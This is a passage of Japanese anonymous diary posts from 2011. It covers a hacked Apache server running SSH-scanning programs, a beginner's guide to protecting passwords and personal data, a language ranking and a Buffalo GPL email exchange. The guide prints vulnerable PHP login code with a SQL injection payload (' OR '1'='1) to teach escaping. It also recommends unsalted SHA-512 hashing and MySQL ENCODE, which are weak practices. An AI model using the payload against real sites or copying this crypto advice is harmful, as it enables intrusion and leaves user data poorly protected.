このコマンドを実行するとドイツのサーバからプログラムをダウンロードして実行するみたい。

ちなみに、いろんなサーバにssh 接続を試みるプログラムっぽい。

このプログラムたちは2007年の11月頃にビルドしたApache/2.0.61にぶら下がって動いていた。

ログは綺麗さっぱりなくなっていて、2011年 7月24日以降の情報しか残っていなかった。

どうやって侵入して実行したのか分からなかったけど、古いApacheと一緒に動いていたのでApacheを更新しなかった自分が悪いと思っている。

「dd_ssh」や「ssh3」の引数を書き換えて実行してみたいけど、それって犯罪じゃないかと思うと怖くてできない。

誰か詳しく調べてちょ。

Permalink | トラックバック(1) | 23:10

2011-07-07

■そろそろApache から Nginxに移行したい人の、Nginx スターティング・ガイド

AV女優.comをApache から Nginxに移行したので、掻き集めた情報をまとめました。 http://blog.av-jyo.com/2011-07/first-steps-for-switching-from-apache-to-nginx.html

Permalink | トラックバック(0) | 10:31

2011-04-14

■パスワードと個人情報を扱うサービスを作る際に気をつけたこと

HTMLはわかるけど、サーバーサイドはお遊びでphpを触ったぐらいだったので、会員制でデータをためこむサイト作りに初めて挑戦した。

今回重視したのは、「いかに個人情報をお漏らししないようにして、万が一漏らしても被害を少なくするか」ということ。

世の中、有償サービスでもパスワードを平文で保存してるサービスが意外と多いらしいので、流出した時のリスクを少しでも減らせる対策として書きます。

今回のシステム 構成

サーバー：ロケットネットのキャンペーンにでレンタルサーバ年１０００円ポッキリプラン

クライアント側の処理：HTML+CSS+jQuery（とプラグインもろもろ）
サーバ側の処理：PHP
Webサーバー：Apache
データベース：MySQL

個人情報こわい！

個人情報ビビる。漏洩とかまじ困るし怒られるしこわい。

俺も巻き込まれたところでは、サミータウンがメールアドレスとパスワードセットでお漏らししてお詫びに１ヶ月無料なにそれこわい。

サミータウンだけならまだいいけど、メアドとパスワードを他のサービスで共通化して使ってる情弱なので、

共通化してメアドとパスワードをどこかのサービスが一箇所でも漏らすと、ヤフオク ID乗っ取り事件みたいなことになる。

http://internet.watch.impress.co.jp/cda/news/2008/09/26/20967.html

俺だってできれば人様のメールアドレスとパスワードとか預かりたくない。

万が一、肉親のメールドレスを発見してパスワードにrapemeとか入ってたら明日からどういう顔すればいいかわからない。

ググってみてもどこにも情報のってない。うーん困った。ダメもとで「個人情報ってどうやって保存したらいいんだろう。。。」

って、twitterでつぶやいたら、「住所とかは可逆暗号化でいいけど、パスワードはハッシュで不可逆化しないとだめだよ！」

と、呪文のようなありがたい言葉を教えてもらった。

暗号化の種類

「住所とかは可逆暗号化でいいけど、パスワードはハッシュで不可逆化しないとだめだよ！」

何のことかわからなったので、調べてみると、

・可逆暗号＝元のデータに戻せる暗号化方式。

・ハッシュ＝ハッシュ値を使った、元のデータに戻せない暗号化方式

うーん。。。よくわからん。。。

電話番号とか住所は、第三者が使用する情報なので、可逆が必要。パスワードは、認証にしか使わないので、

ハッシュ値の結果が一致すれば元のデータがわからなくてもOK、という方式なのでこういった暗号の使い分けをする。

●可逆暗号のイメージ（もとにもどせる）　暗号化キーは開発者が指定する。
090-xxxx-xxxx →（暗号化）→ !'&amp;amp;%($% →（復号化）→ 090-xxxx-xxxx

●ハッシュのイメージ（もとにもどせない）　
登録password（DBに保存）→（ハッシュ値抽出）→!"$#'$#="
ログインpassword →（ハッシュ値抽出）→!"$#'$#="
※二つのハッシュ値が合っていれば、パスワード一致として認証する。

暗号化の実現方法

可逆暗号（電話番号とか住所とかに 適用）

今回はMySQLの関数で実現した。encode関数で暗号化して、decode関数でもとに戻す。

例えばtel_noという項目だけあるテーブルがあるとすると、

//データベースに保存する時
insert into テーブル名 (tel_no)  values (encode(tel_no,'暗号化キー'));
//データベースから取得する時
select decode(tel_no,'暗号化キー') from テーブル名;

これで、データベース格納時は暗号化（バイナリ化）されて、データベースから取り出してHTML表示する時に復号化はされる。

ハッシュ（パスワードとかに 適用）

今回はphpのhash関数で実現した。

＜ユーザ登録時＞

$password=（フォームから取得）
$hash=hash('sha512',$password)
//ユーザ登録時は、ここで生成した$hashをデータベースにぶっこむ。

ユーザ認証時は、入力されたパスワードと、データベースのパスワードが一致するかチェック。

＜ログイン認証時＞

//フォームから入力されたパスワード
$input_password=（フォームから取得）
$input_hash=hash('sha512',$input_password);

//MySQLに保存されたパスワードを取得（略）
$db_hash==（データベースから取得）

//判定
if($input_hash==$db_hash)
	echo 'ログインしますよ！';
	//ここにログイン処理を書く
else
	die('メアドとパスワードがあってないよ！');

これでもしSQLインジェクションとかでデータが流出しても、ハッシュ暗号のパスワードに関してはまず解析されないはず。。。

可逆暗号のデータもphp側の暗号化キーが盗まれない限りバレない。。。はず。。。

暗号化する対象のデータをえらぶ

何でもかんでも暗号化するとコードが煩雑になるし、パフォーマンスにも影響でそうなので、

住所データの都道府県とか、漏れても良いような情報は暗号化しませんでした！！

本人が特定できなければ個人情報ではないらしいので。。。

個人情報保護法
2条による定義
「個人情報」とは、生存する個人に関する情報であって、当該情報に含まれる氏名、生年月日その他の記述等により特定の個人を識別することができるもの（他の情報と容易に照合することができ、それにより特定の個人を識別することができることとなるものを含む。）をいう。

http://ja.wikisource.org/wiki/%E5%80%8B%E4%BA%BA%E6%83%85%E5%A0%B1%E3%81%AE%E4%BF%9D%E8%AD%B7%E3%81%AB%E9%96%A2%E3%81%99%E3%82%8B%E6%B3%95%E5%BE%8B#2

これで、もし漏れても、俺、ウンコ漏らして臭いけど、パンツから出てないからいいよね？というレベルにはなった。はず。

お漏らさないようにキツくする

万が一漏れても大丈夫！と書いたけど、そもそも漏らすなというお話になる。色々調べた結果、以下の対策をほどこした。

SQLインジェクション対策

・当初jQuery側でSQL組み立ててPHPに渡してたので、これだと任意のSQLが実行できて漏らし放題なのでやめる。

・GETとかPOSTでDBに渡すパラメータを扱ってる場合、ちゃんとエスケープする。

例えばログイン認証するPHPで、GET メソッドでフォームからデータを取得するような場合、

$id=$_GET['id']
$pwd=$_GET['pwd']
$sql="select * from ユーザーテーブル where uid='$id' and pwd='$pwd'

とかやってると、login.php?id=admin'&pwd=' OR '1'='1とかパラメータを渡されるとあら不思議！

select *from ユーザテーブル where uid='root' and pwd='' or 1=1

で、誰でもログイン出来ちゃう！ので、mysql_real_escape_stringでエスケープしたり、渡されたパラメータが想定した値かどうか（例えば数値かどうか、とか）のチェックをいれたりする。

クロスサイトスクリプティング

・保存するデータにタグやJavascriptを埋め込まれないように、保存されたデータを出力する場合はPHP側でhtmlspecialchars関数使ってエスケープするようにする。

こんな感じでお漏らし対策をした。間違いがあったら教えて欲しい。

ちなみに出来上がったサイトはこれ。

http://oreni-makasero.com/

Permalink | トラックバック(1) | 04:19

2011-02-20

■これから web開発に携わりたいと考えている人にお勧めの言語

一説によると有史以来開発されたプログラミング言語は4000を超えるとされている。その中でどの言語を選べばいいのか初学者にとっては悩みの種であろう。この記事ではそんな初学者のとっかかりとなることを想定して書かれている。

Javascript(お勧め度☆☆☆☆☆)

Javascriptは長らく「使えない糞言語」とのレッテルを張られていた言語である。2005年頃から Ajaxの台頭で価値が見直され、2010年頃からはnode.jsの盛り上がりで一気にweb開発の主要言語の一つに躍進した。

node.jsは現在活発に開発が進んでおり今年中には実践投入が可能になる画期的なアーキテクチャとなる可能性が高い。それによって「クライアントサイド」と「サーバーサイド」をどちらもJavascriptで開発できることになり、これはよく比較対象にされるLLのライバル達が絶対になし得る事の出来ない独占的なメリットである。iPhoneやandroidのアプリをJavascriptで開発が可能なTitaniumの登場で最早死角が見当たらない状況になっており、求人数は急伸することが予想されている。

web開発初心者がファーストチョイスするプログラミング言語に最も適していると自信を持って断言できる唯一の言語である。

この言語の対象分野：クライアントサイド、サーバーサイド、スマートフォン(iPhone,android)

著名なプログラマ：amachang(web エンジニアのアイドル)　mala(Best Japanese Javascript Programmer)

Java(お勧め度☆☆☆☆)

COBOLのようなレガシー言語を除けば世界中で最も基幹分野に使われている重要で需要の高い言語はJava である。求人数も圧倒的に多く安定した職が得やすい。LLに比べて冗長な記述が必要とされるがその反面高いパフォーマンスを実現しており、またプラットフォームを問わない広い守備範囲と大規模開発に向く言語特性が相まって10年近くプログラミング言語の王者として君臨している。

近年web分野でも大規模データ処理が求められるようになってきたが低パフォーマンスなLLでは実現不可能な大規模分散処理をJavaは可能にしている。オープンソースプロジェクトの雄Apache プロジェクトでもJavaが使われたソフトウェアの勢いが最も盛んである。

初学者が習得するのには少し時間がかかると言われているが一度習得してしまえば君の知肉となり人生を豊かなものに導いてくれる万能言語と言えるだろう。

この言語の対象分野：サーバーサイド、スマートフォン(android)

著名なプログラマ：ひがやすを

Ruby(お勧め度☆☆☆)

web フレームワークの歴史を変えたRuby on Railsの登場により一気にweb アプリケーション開発の主役級に躍り出たRubyも初学者にお勧めできる言語の一つだ。シンプルで可読性の高い文法で簡単に習得できるであろう。しかし他の言語と比べると求人数は少なく、後述するPythonの伸びにも押されてシェアはあまり伸びないとされる。

著名なプログラマ：matz(Ruby 開発者　世界的に最も名の知れた日本人エンジニア)

Python(お勧め度☆☆☆)

Rubyとよく比較される事の多いPythonは今後５年かけてシェアを確実にのばすJavascript以外の唯一のLLである。Googleが肝いりであるという抜群の追い風にのって世界的にはシェアを急速にのばしつつあるが日本国内ではあまり人気がない為にweb上の情報が少ないのが難点。国内での求人はほとんど無い。Ruby同様にシンプルな文法で可読性が高く学びやすい。オライリーの書籍等でアルゴリズムの解説に使われる事が多くなってきたために書けなくとも最低限読めるようになっておくとよい。

Perl(お勧め度☆)

もはやPerl プログラマと名乗るだけで嘲笑の的となった感のあるレガシー言語。進化の速いwebにおいて10年前からほとんど何も変わらない希有な存在。「モダンなPerl」などと質の低いマーケティング戦略に頼らざるを得ない悲しいぐらい進歩が無いために最も勧められない言語である。

著名なプログラマ：otsune(年中暇そうなnetwatcher)

PHP(お勧め度☆)

スパムサイト、詐欺サイト、犯罪サイトに使われることが最も多い言語。書き手の質も総じて低い。

著名なプログラマ：akiyan(ペニーオークション愛好家)

Permalink | トラックバック(8) | 01:39

2011-02-11

■http://anond.hatelabo.jp/20110211004212

元記事にも100人 1000人のユーザーならSQLでも問題ないって話をしたと思うが　1万人ユーザーって簡単なの？そもそも。って話だよね。

そしてその時のサービスは本当にツイッターみたいな大量データーサービスなの？と。（それってツイッターのコンペでサービスとして成り立たなそう。違えばいいけど）

ORACLでハイエンドサーバーのグリッド使うのと　自分でMYSQL分散書くのと　HADOOPにするのと　どれが得かはやってみないと分からん。

ダウンタイムを短くしようとすると、2011年現在では組めるならばオラクルな気はする。すくなくとも簡易的にベンチとらないとわからん。

Hadoopの怖いところは所詮Apache.orgということで、Apache.httpdのように急激な開発が流行から外れて止まってるかのようになることがあることなんだよねぇ。

Apache.httpdって、MPMがいまだpreforkとか　あってWorkerで　event　とかって、しばらく前は、いまだ不安定とかそういう開発状況だと思ってるんだけど。

event MPMってもう安定化したの？event MPMのコア概念である

　『Workerですら遅いから　カーネルコールバックを使おうっていう流れ』自体はもう10年近く昔の概念だと思ってるんだけど・・・

今現在　一番イケてるのはHADOOPだとは思うけど。　Rubyが一時期ほどには勢いがないのと一緒で（いちおうRoR前から知っているみとしては、RoRによる隆盛が奇跡のようなものだが）

まだ、怖いよね。　障害復旧の実装もまだ、弱いし。個人的にはZookeeperがもっとちゃんとなったら、もう1度　調査する！　という感じで塩漬け状態なのがHadoop.

少なくとも単一障害点のフェールーバー周りが本家でどうなるかとかだねー。

どうでもいいけどPHPの方が好きなので　PHP for apache event MPMを安定化希望・・・　まぁ、Perlもいいよね。

だが RubyとPASCAL　だけは無理だ。BEGINとか書いてあるソースを高速に読みこむのは無理。（）ぐらいならいけるけど、BEGINってなんだよ。図形認識できないから読みづらいよ。

Permalink | トラックバック(1) | 03:49

2011-01-19

■Buffaloにメール した件の続き

前回の結果に返信をしたところ、次のようなものが返ってきた。

バッファロー製品お問合せ受付の件 : お問合せID　No.xxxx xxxx xxxx xxxxxx

お客様

平素は弊社製品をご愛顧賜り、誠にありがとうございます。

バッファロー E-Mail サポートよりご質問いただいた件についてご連絡いたします。

※今回頂戴しましたお問い合わせに対するご返信、追加のご質問は、

下記URLよりお問い合わせいただきますようお願い申し上げます。

　返信用メールサポート受付

　http://buffalo.jp/php/lon.php?to=webx&id=xxxx xxxx xxxxxxx

===========================================

いつもお世話になり有り難うございます。

私はメール対応の責任者でxxxと申します。

この度は、GPL ソースコードの開示について、

誤った回答を差し上げました事をご連絡する

とともに深くお詫び申し上げます。

GPL ソースコードにつきまして、社外秘情報として

おりません。

通常は下記ページにて公開を行っておりますが、

DWR-PGについて掲載が遅れている状況でございます。

http://opensource.buffalo.jp/

今週中にはご提供できる予定でございますので、

お待ちいただけますと幸いに存じます。

準備でき次第、私からご連絡させて頂きます。

また、今後同様のことがなきよう再発防止に

尽力して参ります。

最後に誤案内の件、重ねてお詫び申し上げます。

株式会社バッファロー

メールサポート責任者：xxxx

===========================================

[ご質問内容]

オープンソースソフトウェアやGPL関連の質問の対応がこの窓口でで

きないのであれば対応できる窓口を案内していただけるとありがたい

です。

よろしくお願いいたします。

[ご質問内容]

DWR-PGに使用されているAndroid OSはGPLとApache ライセンスのデュ

アルライセンスですが、カーネルなどのLinux由来な部分はGPLとなる

ため、GPLが適用される部分のソースコード開示をお願いいたしま

す。